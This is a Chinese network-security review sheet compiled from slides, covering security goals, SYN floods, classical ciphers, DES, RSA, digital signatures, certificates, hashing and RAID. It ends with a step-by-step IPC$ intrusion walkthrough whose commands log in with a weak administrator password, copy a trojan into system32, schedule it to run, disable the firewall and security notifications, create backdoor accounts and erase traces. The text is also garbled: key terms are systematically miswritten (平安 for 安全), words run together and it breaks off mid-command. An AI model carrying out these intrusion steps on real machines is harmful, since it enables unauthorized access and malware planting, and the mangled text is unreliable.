《網(wǎng)絡(luò)安全總復(fù)習(xí)》

網(wǎng)絡(luò)平安編輯ppt網(wǎng)絡(luò)平安：從本質(zhì)上講，網(wǎng)絡(luò)平安就是網(wǎng)絡(luò)上的信息平安，是指網(wǎng)絡(luò)系統(tǒng)的硬件、軟件和系統(tǒng)中的數(shù)據(jù)受到保護(hù)，不受偶然的或者惡意的攻擊而遭到破壞、更改、泄露，系統(tǒng)連續(xù)可靠正常地運(yùn)行，網(wǎng)絡(luò)效勞不中斷；廣義上講，但凡涉及到網(wǎng)絡(luò)上信息的保密性、完整性、可用性、真實(shí)性和可控性的相關(guān)技術(shù)和理論都是網(wǎng)絡(luò)平安所要研究的領(lǐng)域。編輯ppt信息的平安需求機(jī)密性(Confidentiality)：防止未授權(quán)者讀取信息?！矓?shù)據(jù)加密、訪問(wèn)控制、防計(jì)算機(jī)電磁泄漏等平安措施〕完整性(Integrity)：保證計(jì)算機(jī)系統(tǒng)中的信息處于“保持完整或一種未受損的狀態(tài)〞，禁止未經(jīng)授權(quán)地對(duì)信息進(jìn)行修改?？捎眯?Availability)：合法用戶在需要的時(shí)候，可以正確使用所需的信息而不遭效勞拒絕。編輯ppt信息的平安需求不可否認(rèn)性(Non-repudiation)發(fā)送方和接收方不能抵賴所進(jìn)行的傳輸可控性(controllability)對(duì)信息的傳播和內(nèi)容具有控制能力編輯ppt

釣魚(yú)網(wǎng)站一種網(wǎng)絡(luò)欺詐行為，指不法分子利用各種手段，仿冒真實(shí)網(wǎng)站的URL地址以及頁(yè)面內(nèi)容，或者利用真實(shí)網(wǎng)站效勞器程序上的漏洞在站點(diǎn)的某些網(wǎng)頁(yè)中插入危險(xiǎn)的HTML代碼，以此來(lái)騙取用戶銀行或信用卡賬號(hào)、密碼等私人資料。什么是釣魚(yú)網(wǎng)站編輯ppt通信過(guò)程中的四種攻擊方式圖1-1編輯ppt拒絕效勞攻擊(DoS)DoS--DenialofService：用超出被攻擊目標(biāo)處理能力的海量數(shù)據(jù)包消耗可用系統(tǒng)、帶寬資源等方法的攻擊。導(dǎo)致效勞器不能正常為合法用戶提供效勞的攻擊。編輯ppt攻擊者

目標(biāo)主機(jī)SYNSYN/ACKACK等待應(yīng)答SYN：同步SYN/ACK:同步/確認(rèn)ACK：確認(rèn)SYN攻擊的原理〔1〕編輯ppt....SYN/ACKSYN/ACKSYN/ACKSYNSYNSYN攻擊者目標(biāo)主機(jī)SYNSYN/ACK1nSYN/ACKSYN/ACKSYN/ACKSYN/ACK....等待ACK應(yīng)答.........不應(yīng)答不應(yīng)答重新發(fā)送SYN攻擊的原理〔2〕編輯pptPDRR平安模型信息平安保障的PDRR模型的內(nèi)涵已經(jīng)超出了傳統(tǒng)的信息平安保密，而是保護(hù)〔Protection〕、檢測(cè)〔Detection〕、響應(yīng)〔Reaction〕和恢復(fù)〔Restore〕的有機(jī)結(jié)合。編輯ppt平安技術(shù)評(píng)價(jià)標(biāo)準(zhǔn)1983年美國(guó)國(guó)防部公布了平安標(biāo)準(zhǔn)5200.28：可信計(jì)算系統(tǒng)評(píng)估準(zhǔn)那么TrustedComputingSystemEvaluationCriteria，即桔皮書(shū)。TCSEC共分為如下4類7級(jí)：〔1〕D級(jí)，平安保護(hù)欠缺級(jí)?！?〕C1級(jí)，自主平安保護(hù)級(jí)?！?〕C2級(jí)，受控存取保護(hù)級(jí)?！?〕B1級(jí)，標(biāo)記平安保護(hù)級(jí)?！?〕B2級(jí)，結(jié)構(gòu)化保護(hù)級(jí)。〔6〕B3級(jí)，平安域保護(hù)級(jí)?！?〕A1級(jí)，驗(yàn)證設(shè)計(jì)級(jí)。編輯ppt密碼學(xué)編輯ppt第13頁(yè)密碼的目標(biāo)對(duì)于任何一個(gè)密碼系統(tǒng)，其目標(biāo)都是：只有掌握密鑰的情況下才能將密文恢復(fù)成明文。即：攻擊者即使掌握了密碼算法的全部細(xì)節(jié)和其他信息，仍然不能在沒(méi)有密鑰的情況下恢復(fù)明文。編輯ppt第14頁(yè)E加密算法密文D解密算法明文M明文M加密密鑰Ke解密密鑰Kd加密函數(shù)E作用于M得到密文C，用數(shù)學(xué)表示為：E〔M〕=C.相反地，解密函數(shù)D作用于C產(chǎn)生MD〔C〕=M.密碼體系示意圖編輯ppt第15頁(yè)古典密碼簡(jiǎn)單代替密碼雙重置換密碼一次一密電子本密碼編輯ppt第16頁(yè)簡(jiǎn)單代替密碼簡(jiǎn)單代替密碼的簡(jiǎn)單實(shí)現(xiàn)

就是將明文按照字母表中當(dāng)前字母后移N位加密產(chǎn)生的。通過(guò)查找明文行中的字母，并用密文行中對(duì)應(yīng)的字母進(jìn)行代替。編輯ppt第17頁(yè)簡(jiǎn)單代替密碼簡(jiǎn)單代替密碼的解密通過(guò)查找密文行中的字母，并用明文行中對(duì)應(yīng)的字母進(jìn)行代替。

移動(dòng)3位的簡(jiǎn)單代替密碼，稱為凱撒〔Caesar〕密碼編輯ppt第18頁(yè)Ceasar’sCipherDecryptionPlaintext:spongebobsquarepantsabcdefghijklmnopqrstuvwxyDEFGHIJKLMNOPQRSTUVWXYZABzCPlaintextCiphertextSupposeweknowaCeasar’scipherisbeingused:Givenciphertext:VSRQJHEREVTXDUHSDQWV編輯ppt第19頁(yè)2.2.1簡(jiǎn)單代替密碼如果限定簡(jiǎn)單代替就是字母表那么所有可能的密鑰n是0~25。

假設(shè)攻擊者截獲密文CSYEVIXIVQMREXIH那么攻擊者能夠嘗試所有26種可能的密鑰，來(lái)解密密文，并判斷所解密文是否具有意義。編輯ppt第20頁(yè)什么是蠻力破解？通過(guò)嘗試所有可能的密鑰直至遇到正確的密鑰，即窮舉搜索密鑰。所以密鑰數(shù)應(yīng)該足夠大，以使得攻擊者在合理的時(shí)間范圍內(nèi)沒(méi)有方法窮舉。蠻力破解編輯ppt第21頁(yè)雙重置換密碼雙重置換密碼的簡(jiǎn)單實(shí)現(xiàn)

首先將明文寫(xiě)成給定大小的矩陣形式，然后根據(jù)特定的置換規(guī)那么進(jìn)行行和列的置換。編輯ppt第22頁(yè)DoubleTranspositionPlaintext:attackxatxdawnPermuterowsandcolumns

Ciphertext:xtawxnattxadakcKeyismatrixsizeandpermutations:(3,5,1,4,2)and(1,3,2)編輯ppt第23頁(yè)密碼編碼學(xué)分類對(duì)稱密碼-SymmetricKey公鑰密碼-PublicKey

Hash函數(shù)-Hashalgorithms編輯ppt第24頁(yè)3.1對(duì)稱密鑰密碼對(duì)稱密鑰密碼：提供一個(gè)雙向信道：A和B共享一個(gè)秘密密鑰，雙方既能加密信息發(fā)送給對(duì)方，也可以解密從對(duì)方得到的密文信息。編輯ppt第25頁(yè)3.1對(duì)稱密鑰密碼加密解密明文P密文C明文P密鑰(K)對(duì)稱密碼體制(symmetriccryptosystem)加密密鑰和解密密鑰是相同的C=E(K,P)P=D(K,E(K,P))編輯ppt第26頁(yè)3.1對(duì)稱密鑰密碼按照明文的處理方法分分組密碼(blockcipher)流密碼(streamcipher)編輯ppt第27頁(yè)3.3.2數(shù)據(jù)加密標(biāo)準(zhǔn)-DES數(shù)據(jù)加密標(biāo)準(zhǔn)DataEncryptionStandard：是20世紀(jì)70年代提出的是基于IBM公司提出的Feistel結(jié)構(gòu)的Lucifer密碼設(shè)計(jì)的DES后來(lái)成為美國(guó)政府的官方標(biāo)準(zhǔn)DES是第一代公開(kāi)的、完全說(shuō)明細(xì)節(jié)并完全商業(yè)化得現(xiàn)代加密技術(shù)，并被世界公認(rèn)。編輯ppt第28頁(yè)DES算法簡(jiǎn)介〔了解〕DES是分組密碼，明文分組長(zhǎng)度為64bits(8bytes)密鑰長(zhǎng)度為64bits，有8bits奇偶校驗(yàn)，有效密鑰長(zhǎng)度為56bits。算法主要包括：初始置換IP(Initial

Permutation)16輪迭代的乘積變換逆初始置換IP-116個(gè)子密鑰產(chǎn)生器。編輯ppt第29頁(yè)IPL0R0L1=R0R1=L0⊕f(R0,K1)R2=L1⊕f(R1,K2)L2=R1明文L15=R14R16=L15⊕f(R15,K16)R15=L14⊕f(R14,K15)L16=R15IP-1密文fK1fK2fK16DES加密流程圖編輯ppt第30頁(yè)4.1公鑰密碼公鑰密碼：非對(duì)稱加密算法〔AsymmetricAlgorithm〕也稱公開(kāi)密鑰算法〔PublicKeyAlgorithm〕，雙鑰密碼。對(duì)稱密鑰密碼系統(tǒng)和非對(duì)稱密鑰密碼系統(tǒng)將會(huì)同時(shí)共存，并繼續(xù)為公眾提供效勞。它們是相互補(bǔ)充的，一種系統(tǒng)的優(yōu)勢(shì)可以彌補(bǔ)另一種系統(tǒng)的劣勢(shì)。編輯ppt第31頁(yè)對(duì)稱密碼的缺乏密鑰管理量的困難傳統(tǒng)密鑰管理：兩兩分別用一個(gè)密鑰時(shí)，那么n個(gè)用戶需要C(n,2)=n(n-1)/2個(gè)密鑰，當(dāng)用戶量增大時(shí)，密鑰空間急劇增大。密鑰必須通過(guò)某一信道傳輸，對(duì)這個(gè)信道的平安性的要求比正常的傳送消息的信道的平安性要高數(shù)字簽名的問(wèn)題傳統(tǒng)加密算法無(wú)法實(shí)現(xiàn)抗抵賴的需求。編輯ppt第32頁(yè)4.1公鑰密碼對(duì)稱密鑰密碼，加密和解密使用同一密鑰。公鑰密碼，加密中使用一個(gè)密鑰〔可以公開(kāi)，叫公鑰〕，解密使用另外一個(gè)密鑰。公鑰密碼解決了對(duì)稱密碼中，如何平安地進(jìn)行密鑰分配的問(wèn)題編輯ppt第33頁(yè)4.1非對(duì)稱密鑰密碼加密解密明文P密文C明文P加密密鑰Ke解密密鑰KdC=E(Ke,P)P=D(Kd,E(Ke,P)非對(duì)稱密碼體制(asymmetriccryptosystem)加密密鑰和解密密鑰是成對(duì)出現(xiàn)加密過(guò)程和解密過(guò)程不同，使用的密鑰也不同編輯ppt第34頁(yè)對(duì)稱、非對(duì)稱密鑰密碼系統(tǒng)兩種系統(tǒng)在概念上的不同，基于保存秘密方法不同。對(duì)稱密鑰密碼系統(tǒng)中，秘密必須在兩個(gè)人之間共享非對(duì)稱密鑰密碼系統(tǒng)中，秘密是個(gè)人獨(dú)享的，每個(gè)人都創(chuàng)立并保存自己的秘密。在一個(gè)有n個(gè)人的組織中，對(duì)稱密鑰密碼系統(tǒng)，需要有n(n-1)/2個(gè)共享秘密。對(duì)于非對(duì)稱密鑰密碼系統(tǒng)，只需要n個(gè)個(gè)人秘密。對(duì)于一個(gè)有一百萬(wàn)人的組織來(lái)說(shuō)，對(duì)稱密鑰密碼系統(tǒng)需要五億個(gè)共享秘密；非對(duì)稱密鑰密碼系統(tǒng)需要一百萬(wàn)個(gè)個(gè)人秘密。編輯ppt第35頁(yè)對(duì)稱、非對(duì)稱密鑰密碼系統(tǒng)加密之外，其他平安方面的問(wèn)題需要運(yùn)用非對(duì)稱密鑰密碼系統(tǒng)，如：公正和數(shù)字簽名〔基于個(gè)人秘密的應(yīng)用程序〕。對(duì)稱密鑰密碼系統(tǒng)基于符號(hào)〔字符或比特〕的代換和置換，非對(duì)稱密鑰密碼系統(tǒng)那么基于把數(shù)學(xué)函數(shù)應(yīng)用于數(shù)字。即在非對(duì)稱密鑰密碼系統(tǒng)中，明文和密文都是數(shù)字，加密和解密就是把數(shù)學(xué)函數(shù)應(yīng)用于數(shù)字以創(chuàng)立另外一些數(shù)字的過(guò)程。編輯ppt第36頁(yè)雙方的需要非對(duì)稱密鑰密碼系統(tǒng)是用數(shù)學(xué)函數(shù)進(jìn)行加密和解密，比對(duì)稱密鑰密碼系統(tǒng)要慢得多，對(duì)于大信息的加密，對(duì)稱密鑰密碼系統(tǒng)還是需要的。在公證、數(shù)字簽名和密鑰交換等方面需要非對(duì)稱密鑰密碼系統(tǒng)。今天為了能夠利用平安的各個(gè)方面，既需要對(duì)稱密碼密碼系統(tǒng)，也需要非對(duì)稱密碼系統(tǒng)。是相互補(bǔ)充的。編輯ppt第37頁(yè)公鑰密碼的特點(diǎn)加密與解密的密鑰不同公鑰密碼的密鑰是一組密鑰對(duì)〔公鑰,私鑰〕可以公開(kāi)的密鑰稱為公鑰，必須保密的密鑰稱為私鑰。知道密碼算法和公鑰，從公鑰得到私鑰在計(jì)算上是不可行的兩個(gè)密鑰配對(duì)使用公鑰加密信息，私鑰解密信息私鑰簽名信息，公鑰驗(yàn)證簽名編輯ppt第38頁(yè)公鑰密碼的加密明文明文HiBobAliceB的私鑰密文AliceBobA加密B解密HiBobAliceHiBobAliceHiBobAlice公開(kāi)保密B的公鑰編輯ppt第39頁(yè)4.1公鑰密碼公鑰密碼體制是基于“單向陷門(mén)函數(shù)〞的。單向陷門(mén)函數(shù)是滿足以下條件的函數(shù)f：(1)給定x，計(jì)算y=f(x)是容易的；(2)給定y,計(jì)算x使x=f-1(y)是不可行的。(3)存在k，k時(shí),對(duì)給定的任何y，假設(shè)相應(yīng)的x存在，那么計(jì)算x使fk-1(y)是容易的。即：給出y和陷門(mén)K〔秘密〕，很容易計(jì)算x。

編輯ppt第40頁(yè)4.1公鑰密碼-單向陷門(mén)函數(shù)單向陷門(mén)函數(shù)。即一個(gè)函數(shù)正向計(jì)算很容易；但是反向計(jì)算那么十分困難。陷門(mén)的目的是確保攻擊者不能使用公開(kāi)的信息得出秘密的信息。如：計(jì)算兩個(gè)素?cái)?shù)p和q的乘積N=pq很容易，但是給定N(如果N很大)分解它的因子p和q那么是困難的。

編輯ppt第41頁(yè)4.1公鑰密碼Bob擁有公鑰和私鑰組成的密鑰對(duì)任何人都可以使用Bob的公鑰加密消息給Bob；但只有Bob本人才能對(duì)消息進(jìn)行解密；應(yīng)為只有Bob擁有私鑰。

編輯ppt第42頁(yè)4.1公鑰密碼Bob擁有公鑰和私鑰組成的密鑰對(duì)Bob能夠使用他的私鑰進(jìn)行“加密〞得到消息M的簽名；任何人都可以使用Bob的公鑰“解密〞這條消息；這是公鑰密碼最有用的特性之一。

編輯ppt第43頁(yè)公鑰密碼的簽名文件A簽名的文件HiBobAliceA的公鑰A的私鑰簽名文件AliceBobA簽名B驗(yàn)證HiBobAlice保密公開(kāi)HiBobAliceAliceHiBobAliceAlice編輯ppt第44頁(yè)4.3RSARSA公鑰加密算法是1977年由Rivest、Shamirh和Adleman在〔美國(guó)麻省理工學(xué)院〕開(kāi)發(fā)的。RSA取名來(lái)自開(kāi)發(fā)他們?nèi)叩拿?。RSA是目前應(yīng)用最廣泛的公鑰密碼算法，它能夠抵抗到目前為止的所有密碼攻擊，已被ISO推薦為公鑰數(shù)據(jù)加密標(biāo)準(zhǔn)。編輯ppt第45頁(yè)4.3RSARSA算法基于一個(gè)十分簡(jiǎn)單的數(shù)論事實(shí)：將兩個(gè)大素?cái)?shù)相乘十分容易，但要對(duì)其乘積進(jìn)行因式分解卻極其困難，因此可以將乘積公開(kāi)作為加密密鑰。

編輯ppt第46頁(yè)RSA算法選擇兩個(gè)大素?cái)?shù)p和q，并計(jì)算乘積N=pq選擇與(p

1)(q

1)互素的整數(shù)e并求解模(p

1)(q

1)的e的乘法逆，記為d

即ed=1mod(p

1)(q

1)Publickey

is(N,e)Privatekey

isd編輯ppt第47頁(yè)DES和RSA算法的特點(diǎn)和比較(1)DES的特點(diǎn)可靠性較高(16輪變化，增大了混淆性和擴(kuò)散性，輸出不殘存統(tǒng)計(jì)信息)；加密/解密速度快；算法容易實(shí)現(xiàn)(可由軟件和硬件實(shí)現(xiàn)，硬件實(shí)現(xiàn)速度快)，通用性強(qiáng)；算法具有對(duì)稱性，密鑰位數(shù)少，存在弱密鑰和半弱密鑰，便于窮盡攻擊；密鑰管理復(fù)雜。編輯ppt第48頁(yè)(2)RSA算法的特點(diǎn)密鑰管理簡(jiǎn)單(網(wǎng)上每個(gè)用戶僅保密一個(gè)密鑰，且不需密鑰配送)；便于數(shù)字簽名；可靠性較高(取決于分解大素?cái)?shù)的難易程度)；算法復(fù)雜，加密/解密速度慢,難于實(shí)現(xiàn)。DES和RSA算法的特點(diǎn)和比較編輯ppt第49頁(yè)4.4公鑰密碼的應(yīng)用公鑰密碼與對(duì)稱密碼相比有兩個(gè)優(yōu)點(diǎn)：使用公鑰密碼，不需要實(shí)現(xiàn)共享密鑰。使用公鑰密碼，進(jìn)行數(shù)字簽名，不僅能提供完整性，還能夠提供不可否認(rèn)性。

編輯ppt第50頁(yè)規(guī)定符號(hào)(簽名)SignmessageMwithAlice’sprivatekey:[M]Alice(加密)EncryptmessageMwithAlice’spublickey:{M}AliceThen{[M]Alice}Alice

=M[{M}Alice]Alice

=M編輯ppt第51頁(yè)秘密性和不可否認(rèn)性假設(shè)Alice想發(fā)送消息M給Bob，出于秘密性的考慮，Alice使用Bob的公鑰對(duì)M加密:{M}Bob為了確保完整性和不可否認(rèn)性，她使用她的私鑰對(duì)M簽名。采用如下兩種方法哪一種呢?Signandencrypt{[M]Alice}BobEncryptandsign[{M}Bob]Alice兩種操作順序?qū)ζ桨残杂袩o(wú)影響？編輯ppt第52頁(yè)場(chǎng)景一假設(shè)Alice和Bob正在熱戀，Alice決定發(fā)送消息M=“Iloveyou〞給Bob使用先簽名后加密，她發(fā)送{[M]Alice}Bob給Bob不久之后，Alice和Bob出現(xiàn)感情危機(jī)，出于惡意，Bob收到后解密獲得簽名的消息[M]Alice,并將其加密為{[M]Alice}Charlie，并將消息發(fā)送給Charlie于是Charlie以為Alice愛(ài)上了他這個(gè)誤會(huì)使得Charlie和Alice之間很為難編輯ppt第53頁(yè)SignandEncryptAliceBob{[M]Alice}BobQ:Whatistheproblem?A:Charliemisunderstandscrypto!Charlie{[M]Alice}CharlieM=“Iloveyou〞編輯ppt第54頁(yè)場(chǎng)景二Alice通過(guò)此事得到教訓(xùn)，再也不采用先簽名再加密的方法當(dāng)她需要同時(shí)實(shí)現(xiàn)秘密性和不可否認(rèn)性時(shí)，她選擇先加密再簽名一段時(shí)間之后，Alice和Bob感情復(fù)合，Alice獲得重要考古發(fā)現(xiàn)，要告訴Bob

[{M}Bob]Alice

發(fā)送給Bob然而Charlie對(duì)于上次的愚弄很生氣，他能偶截獲Alice的消息并進(jìn)行攻擊Charlie使用Alice公鑰計(jì)算出{M}Bob

編輯ppt第55頁(yè)場(chǎng)景二并用自己的私鑰簽名后發(fā)給BobBob收到消息后，認(rèn)為重大考古是Charlie發(fā)現(xiàn)的，并立即給Charlie頒發(fā)獎(jiǎng)金Alice聽(tīng)說(shuō)后，發(fā)誓再也不用先加密再簽名的方法了那該怎么辦呢？編輯ppt第56頁(yè)EncryptandSignAliceBob[{M}Bob]AliceNotethatCharliecannotdecryptMQ:Whatistheproblem?A:Bobmisunderstandscrypto!Charlie[{M}Bob]CharlieM=“Mytheory,whichismine….〞編輯ppt數(shù)字簽名的實(shí)現(xiàn)目前應(yīng)用最廣泛的數(shù)字簽名加解密算法是RSA因RSA的公鑰、私鑰太長(zhǎng)太復(fù)雜，不便于記憶和管理，一般以文件的形式存儲(chǔ)，該文件同時(shí)還包含用戶的個(gè)人信息，真正實(shí)現(xiàn)“個(gè)人簽名〞的效果。一般把這種文件稱為數(shù)字證書(shū)。編輯ppt數(shù)字證書(shū)之所以可以稱之為“證書(shū)〞，就一定要有“防偽〞功能。因?yàn)樽C書(shū)中要包含用戶的個(gè)人身份信息〔如姓名、單位，電子郵件等〕，并且最重要的，還有用戶的密鑰。試想一下，如果任何人都可以自定義信息并發(fā)布證書(shū)，誰(shuí)能保證真?zhèn)文?？就像現(xiàn)實(shí)生活中的個(gè)人身份一樣，任何人都能認(rèn)證么？數(shù)字證書(shū)引入編輯ppt因此，正如身份證由國(guó)家權(quán)威部門(mén)〔公安部〕來(lái)頒發(fā)。讓我們重新定義數(shù)字證書(shū)，數(shù)字證書(shū)是由一個(gè)權(quán)威機(jī)構(gòu)發(fā)行的，至少包含一個(gè)公鑰、證書(shū)持有人〔或單位〕的名稱以及證書(shū)授權(quán)中心對(duì)這些信息的數(shù)字簽名的文件。一般情況下證書(shū)中還包括密鑰的有效時(shí)間，發(fā)證機(jī)關(guān)(證書(shū)授權(quán)中心)的名稱，該證書(shū)的序列號(hào)等信息。數(shù)字證書(shū)DigitalCertificate數(shù)字證書(shū)就相當(dāng)于互聯(lián)網(wǎng)上的通信雙方的身份證編輯ppt頒發(fā)數(shù)字證書(shū)的機(jī)構(gòu)稱為CA〔CertificateAuthority,即認(rèn)證中心〕是在電子交易中承擔(dān)平安認(rèn)證效勞，簽發(fā)數(shù)字證書(shū)，確認(rèn)用戶身份等工作的互聯(lián)網(wǎng)上具有權(quán)威性和公正性的一個(gè)普遍可信的第三方效勞機(jī)構(gòu)。類似生活中頒發(fā)身份證的公安部門(mén)數(shù)字證書(shū)的獲取編輯pptA加密B解密明文明文B的公鑰B的私鑰密文加密模型A加密(簽名)B解密(驗(yàn)證)明文明文A的私鑰A的公鑰密文認(rèn)證模型課前回憶編輯ppt采用數(shù)字簽名，應(yīng)該實(shí)現(xiàn)的功能：保證信息是由簽名者自己簽名發(fā)送的，

簽名者不能否認(rèn)或難以否認(rèn)。保證信息自簽發(fā)后到收到止未作任何改動(dòng)，簽發(fā)的文件是真實(shí)完整的。數(shù)字簽名的功能編輯ppt一個(gè)簡(jiǎn)單的數(shù)字簽名原理從理論上說(shuō)，采用公鑰體制技術(shù)進(jìn)行的應(yīng)用，其實(shí)就是一個(gè)簽名簽證的過(guò)程。即：發(fā)送方用私鑰對(duì)某個(gè)文件進(jìn)行加密〔簽名〕，接收方利用發(fā)送方的公鑰進(jìn)行解密〔驗(yàn)證〕。為何采用對(duì)稱密碼技術(shù)的應(yīng)用就不能稱為簽名呢？就是因?yàn)榧咏饷苊荑€相同，無(wú)法實(shí)現(xiàn)身份驗(yàn)證。但非對(duì)稱密碼技術(shù)加解密密鑰不同，可以實(shí)現(xiàn)“公鑰/私鑰〞密鑰對(duì)的唯一性。編輯ppt研究非對(duì)稱密碼技術(shù)〔如RSA〕的理論模型，我們知道，其加解密速度是很慢的，尤其不適合數(shù)據(jù)量大的加解密。如何改進(jìn)呢？簡(jiǎn)單簽名面臨的問(wèn)題編輯pptHash函數(shù)Hash，一般翻譯做“散列〞，也有直接音譯為“哈希〞的，也叫雜湊函數(shù)，就是把任意長(zhǎng)度的輸入信息通過(guò)特定的算法，變換成固定長(zhǎng)度的輸出值〔也稱摘要〕。因此，Hash算法屬于典型的壓縮映射。Hash函數(shù)必須滿足以下特征：任意長(zhǎng)度的輸入值，生成固定長(zhǎng)度的輸出值不同的輸入，一定生成不同的輸出。不可能從輸出值來(lái)確定輸入信息，即不可逆編輯ppt計(jì)算機(jī)實(shí)體平安編輯ppt磁盤(pán)陣列〔RAID〕配置磁盤(pán)陣列配置RedundantArrayofIndependentDisks獨(dú)立磁盤(pán)冗余陣列，簡(jiǎn)稱磁盤(pán)陣列。

XX公司更高的存儲(chǔ)性能自動(dòng)備份、數(shù)據(jù)恢復(fù)能力編輯ppt簡(jiǎn)單的說(shuō)，RAID是一種把多塊獨(dú)立的硬盤(pán)〔物理硬盤(pán)〕按不同方式組合起來(lái)形成一個(gè)硬盤(pán)組〔邏輯硬盤(pán)〕，從而提供比單個(gè)硬盤(pán)更高的存儲(chǔ)性能和提供數(shù)據(jù)冗余的技術(shù)。組成磁盤(pán)陣列的不同方式稱為RAID級(jí)別〔RAIDLevels〕。RIAD及RIADLevels編輯pptRAIDLevels—RAID0RAID0連續(xù)以位或字節(jié)為單位分割數(shù)據(jù)，并行讀/寫(xiě)于多個(gè)磁盤(pán)上。沒(méi)有校驗(yàn)數(shù)據(jù)，只是單純地提高性能，并沒(méi)有為數(shù)據(jù)的可靠性提供保證，A0A1A2A3A4A5A6A74N-24N-14N4N-3............磁盤(pán)0磁盤(pán)2磁盤(pán)3磁盤(pán)1File1234優(yōu)點(diǎn)：1.是最快，最有效率的陣列類型；2.沒(méi)有容量損失〔所有的存儲(chǔ)空間都可用〕。缺點(diǎn)：沒(méi)有容錯(cuò)能力。一個(gè)磁盤(pán)出錯(cuò)導(dǎo)致?lián)p失所有陣列內(nèi)的數(shù)據(jù)。典型應(yīng)用：特別適用于對(duì)性能要求較高，而對(duì)數(shù)據(jù)平安不太在乎的領(lǐng)域，如圖形工作站等。對(duì)于個(gè)人用戶，RAID0也是提高硬盤(pán)存儲(chǔ)性能的絕佳選擇。編輯pptRAIDLevels—RAID1RAID1鏡像〔每?jī)蓚€(gè)硬盤(pán)的內(nèi)容一模一樣〕需要至少兩塊硬盤(pán)A0A0A1A1NN......磁盤(pán)0磁盤(pán)1File1234優(yōu)點(diǎn)：1.對(duì)數(shù)據(jù)進(jìn)行了完全的備份，其可靠性是最高的2.讀取性能較單磁盤(pán)高。缺點(diǎn)：空間利用率只有50%。典型應(yīng)用：隨機(jī)數(shù)據(jù)寫(xiě)入，要求平安性高，如效勞器、數(shù)據(jù)庫(kù)存儲(chǔ)領(lǐng)域。編輯pptRAIDLevels—RAID5RAID5有校驗(yàn)數(shù)據(jù)，提供數(shù)據(jù)容錯(cuò)能力至少需要3塊硬盤(pán)，最好使用相同容量相同速度的硬盤(pán)

校驗(yàn)值分散在各個(gè)盤(pán)的不同位置，相當(dāng)程度的分散了負(fù)載，故有較好的性能，優(yōu)點(diǎn)：會(huì)實(shí)現(xiàn)RAID0的高速存儲(chǔ)讀取并且也會(huì)實(shí)現(xiàn)RAID1的數(shù)據(jù)恢復(fù)功能。缺點(diǎn)：一般需要價(jià)格昂貴的硬件設(shè)備raid卡。典型應(yīng)用：要求存儲(chǔ)性能、數(shù)據(jù)平安和存儲(chǔ)本錢(qián)兼顧的領(lǐng)域，如金融、銀行和股市的聯(lián)機(jī)交易系統(tǒng)〔OLTP〕。編輯ppt網(wǎng)絡(luò)入侵編輯pptIPC$入侵InternetProcessConnectionIPC$可以被理解為一種“專用管道〞，可以在連接雙方建立一條平安的通道，實(shí)現(xiàn)對(duì)遠(yuǎn)程計(jì)算機(jī)的訪問(wèn)。簡(jiǎn)單說(shuō)就是一個(gè)特殊的共享資源。IPC$入侵是利用IPC$共享和弱口令實(shí)現(xiàn)對(duì)遠(yuǎn)程計(jì)算機(jī)非授權(quán)訪問(wèn)的一種入侵方法。編輯ppt入侵前奏備注：可事先使用IP掃描、端口掃描等方面的軟件確定活動(dòng)主機(jī)的IP及139、445端口是否開(kāi)放編輯ppt第一步：建立連接語(yǔ)法：netuse\\IP地址(或計(jì)算機(jī)名)\IPC$“密碼〞/user:“用戶名〞例如：netuse\\192.168.56.101\ipc$“123〞/user:“administrator〞編輯ppt第二步：操控遠(yuǎn)程計(jì)算機(jī)只要第一步順利完成，你就有操控遠(yuǎn)程計(jì)算機(jī)的權(quán)限了。比方：查看遠(yuǎn)程計(jì)算機(jī)的硬盤(pán)內(nèi)容向遠(yuǎn)程計(jì)算機(jī)上復(fù)制文件〔如木馬程序，腳本命令文件等〕遠(yuǎn)程計(jì)算機(jī)上的效勞控制遠(yuǎn)程計(jì)算機(jī)上的進(jìn)程查看和終止〔如關(guān)閉防火墻軟件、殺毒軟件等〕在遠(yuǎn)程計(jì)算機(jī)上創(chuàng)立用戶賬戶〔一般為下次入侵的后門(mén)賬戶〕重啟〔關(guān)閉〕遠(yuǎn)程計(jì)算機(jī)修改遠(yuǎn)程計(jì)算機(jī)的注冊(cè)表“清掃戰(zhàn)場(chǎng)〞〔清理入侵痕跡〕編輯ppt查看遠(yuǎn)程計(jì)算機(jī)的內(nèi)容使用netview查看網(wǎng)絡(luò)中的共享資源使用netuse〔推薦〕,例如：netuseZ:\\192.168.56.101\c$netuseY:\\192.168.56.101\admin$編輯ppt向遠(yuǎn)程計(jì)算機(jī)復(fù)制文件使用“我的電腦〞使用copy命令(最好掌握),例如：copyc:\muma.exeY:\system32編輯ppt遠(yuǎn)程計(jì)算機(jī)上運(yùn)行程序任務(wù)方案可以采用交互式方式添加，也可使用命令at〔最好掌握〕最常用法：at[\\遠(yuǎn)程計(jì)算機(jī)IP]運(yùn)行的時(shí)間命令或程序如：at\\192.168.56.10116:35c:\windows\muma.exe備注：如何得知遠(yuǎn)程計(jì)算機(jī)的當(dāng)前時(shí)間呢？可用nettime命令，如：nettime\\192.168.56.101編輯ppt遠(yuǎn)程計(jì)算機(jī)上的效勞控制對(duì)于網(wǎng)絡(luò)入侵而言，對(duì)遠(yuǎn)程計(jì)算機(jī)上的效勞控制顯得十分重要。如關(guān)閉其防火墻，翻開(kāi)其任務(wù)調(diào)度等等，便于你更好的控制入侵的主機(jī)一般有2種方式：一是用圖形界面操作，即用本機(jī)的效勞控制臺(tái)程序，如以下圖二是用命令sc〔推薦〕編輯pptsc命令最常用法scstart效勞名如：scstartlanmanserver 開(kāi)啟文件共享效勞scstop效勞名如：scstopSharedAccess 關(guān)閉內(nèi)置防火墻scconfig效勞名start=(auto/disabled)配置某個(gè)效勞的啟動(dòng)類型〔自動(dòng)啟動(dòng)、已禁用〕如：scconfigTlntSvrstart=auto(注意：=與值間有一空格)編輯ppt附：常用手法scstartlanmanserver 開(kāi)啟文件共享效勞scstartRemoteRegistry 開(kāi)啟遠(yuǎn)程注冊(cè)表效勞scstartSchedule 開(kāi)啟任務(wù)方案效勞scstartTlntsvr 開(kāi)啟Telnet效勞scstopSharedAccess 關(guān)閉內(nèi)置防火墻scstopwuauserv 關(guān)閉平安中心通知scstopwscsvc 